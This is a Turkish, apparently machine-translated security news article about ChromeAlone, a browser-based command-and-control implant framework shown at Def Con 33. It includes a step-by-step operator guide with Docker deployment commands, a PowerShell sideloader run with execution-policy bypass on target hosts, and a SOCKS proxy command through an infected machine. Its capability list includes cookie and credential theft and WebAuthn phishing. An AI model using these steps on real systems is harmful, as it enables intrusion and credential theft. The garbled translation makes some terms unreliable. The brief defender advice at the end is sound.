Chrome’u C2 platformuna dönüştüren bir kobalt grev benzeri araç


Def Con 33’te Praetorian Security’den Güvenlik Araştırmacısı Mike Weber, Chromealone – A Krom Tabanlı Tarayıcı Komutu ve Kontrolü (C2) Çerçevesi Kobalt Strike veya Meterpreter gibi geleneksel saldırı güvenlik implantlarını değiştirebilir.

Çok geçmeden, web tarayıcıları HTTP istekleri için sargılardan biraz daha fazlasıydı. Bugün, tam işletim sistemlerine benzeyecek kadar karmaşık, özellik dolu platformlar. Bu evrim kolaylık getiriyor, aynı zamanda büyük bir saldırı yüzeyi de getiriyor.

Chromealone, geleneksel bir komut ve kontrol (C2) implantının yeteneklerini çoğaltmak için yerleşik krom özellikleri kullanarak, çoğu uç nokta algılama sisteminin çoğunu geçerken bu karmaşıklığı silahlandıran açık kaynaklı bir çerçevedir.

Chromealone’u birbirinden ayıran şey, gizlidir: tamamen Chromium’un yerel özellikleri içinde gizlenir, uç nokta algılama ve yanıt (EDR) çözümlerinin sıklıkla aradığı açık kötü amaçlı ayak izlerinden kaçınır.

ChoMealone, kullanıcı etkileşimi olmadan tarayıcıya kötü niyetli bileşenleri açar, kaldırma:

  • Yerel Chrome API’leri kalıcılık için.
  • Webassembly (WASM) Gapma ve anti-analizi için.
  • İzole web uygulamaları ve uzantılar teslimat mekanizmaları olarak.
  • Tarayıcı Özellik İstismarı Şüpheli ikili dosyaları diske bırakmaktan kaçınmak için.

Sonuç, meşru tarayıcı etkinliğine karışan son derece yetenekli, gizli bir implanttır – tarayıcı uzantıları veya dahili işlemler yerine yürütülebilir dosyalara odaklanan geleneksel antivirüs ve EDR sistemleri için bir zorluk.

Chromealone neden büyük bir anlaşma

Depoya göre, Chromealone implantları şunları yapabilir:

  • Olarak hareket etmek Çorap TCP Proxy Enfekte konakçıdan.
  • Tarayıcı Oturumları Çalma ve saklanan kimlik bilgileri.
  • Yürütülebilir dosyaları başlatın Doğrudan Chrome’dan.
  • Phish Webauthn İstemleri Yubikeys, Titan Güvenlik Anahtarları ve diğer fiziksel kimlik doğrulayıcılardan.
  • Kalıcılığı korumak Geleneksel ikili dosyalar olmadan -Yalnızca yerleşik krom işlevselliği kullanarak.

Kırmızı ekipler için bu gizli ve esneklik anlamına gelir. Savunucular için, saldırı aramak için bir yer daha demektir: tarayıcının kendisi.

Chromealone için adım adım operatör kılavuzu

Araç araştırma ve yetkili testler için yayınlanırken, okuma tam bir dağıtım boru hattını detaylandırıyor. İşte damıtılmış nasıl yapılır.

1. Docker görüntüsünü oluşturun

docker build -t chromealone 

2. Altyapı dağıtın

ChromealOne iki dağıtım modunu destekler:

Seçenek A – Taze AWS Dağıtım

Gereksinimler:

  • AWS hesabı:
    • Tam EC2 Yazma İzinleri
    • Route53 DNS Yönetimi
    • Kayıtlı bir alanlı en az bir barındırılan bölge
  • AWS CLI Kimlik Bilgileri ~/.aws/credentials

Emretmek:

docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws \
chromealone --domain=sendmea.click --appname=UpdateService
  • --domain Kontrol ettiğiniz bir Route53 etki alanıyla eşleşmelidir.
  • --appname Kayıt defteri anahtarları ve klasörler için kullanılır – zararsız bir şey seçin.

Çıktılar:

  • output/client -Web tabanlı yönetim konsolu
  • output/sideloader.ps1 – Hedef için PowerShell yükleyicisi
  • output/extension – Kötü niyetli krom uzantısı
  • output/iwa – Kötü niyetli izole web uygulaması paketi
  • output/relay-deployment – AWS Host için Terraform Artifacts & SSH Anahtarı

Seçenek B – Mevcut Dağıtım’ı Kullanma

Zaten bir sunucunuz varsa, ChroMealone’u işaret edin. terraform.tfvars:

docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws \
chromealone --tfvars=/project/path/to/terraform.tfvars --appname=UpdateService

Bu, sideloaderleri ve kötü niyetli uzantıları yeniden canlandırır Altyapı yeniden düzenlemeden.

3. Hedef ana bilgisayarlara yükleyin

Kopya sideloader.ps1 hedefe ve koşuya:

powershell.exe -ExecutionPolicy Bypass -File .\sideloader.ps1

İsteğe bağlı bayraklar:

  • -InstallNativeMessagingHost $true → Kabuk komutları için gerekli
  • -ForceRestart $true → Koruyucular Hemen etkinleştirme için krom yeniden başlatma

Yürütme genellikle alır 20-30 saniye.

4. Kromalon çalıştırma

Bir kez konuşlandırıldığında, açık:

output/client/index.html

Bu önceden yapılandırılmış WebApp, Savaş planı röle sunucusu.

Buradan, operatörler şunları yapabilir:

  • Dökme Geçmişi ve Kurabiyeler
  • Kimlik Bilgileri Yakalama
  • Webauthn istemlerini tetikle
  • Dosya sistemine göz atın
  • Kabuk komutlarını yürüt

5. Çoraplar Proxy

Enfekte her ana bilgisayarın “Aracı Bilgileri” panelinde gösterilen benzersiz bir çorap bağlantı noktası vardır.

Örnek:

proxychains -q socks5 admin:[email protected]:1081 curl http://ifconfig.me

Chromealone’un iç işleri

Repo özel bileşenlere ayrılıyor:

  • Savaş planı – Yönetim Sunucusu + AWS Dağıtım Komut Dosyaları
  • Blowtorch – SOCKS için İzole Web Uygulaması Proxy ve WebSocket Comms
  • Kapı kolu – PowerShell Sideloader Jeneratörü
  • Sıcak tekerlekli -Kötü niyetli krom uzantısı (WebAssembly tabanlı özellikler)
  • Paintbucket – WebAuthn Kimlik Yardım senaryoları

Chromealone meşru bir penetrasyon test aracı olsa da, büyüyen bir eğilim gösterir: günlük yazılımın silahlandırılması. Tarayıcılar giderek daha fazla ikisi birden Saldırı Vektörü ve Komuta Merkezi.

Savunucular:

  • Şüpheli tarayıcı uzantıları için monitör.
  • Anomaliler için Webauthn Etkinliği Denetimi.
  • Beklenmedik giden WebSocket/Socks trafiğini izleyin.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!



Source link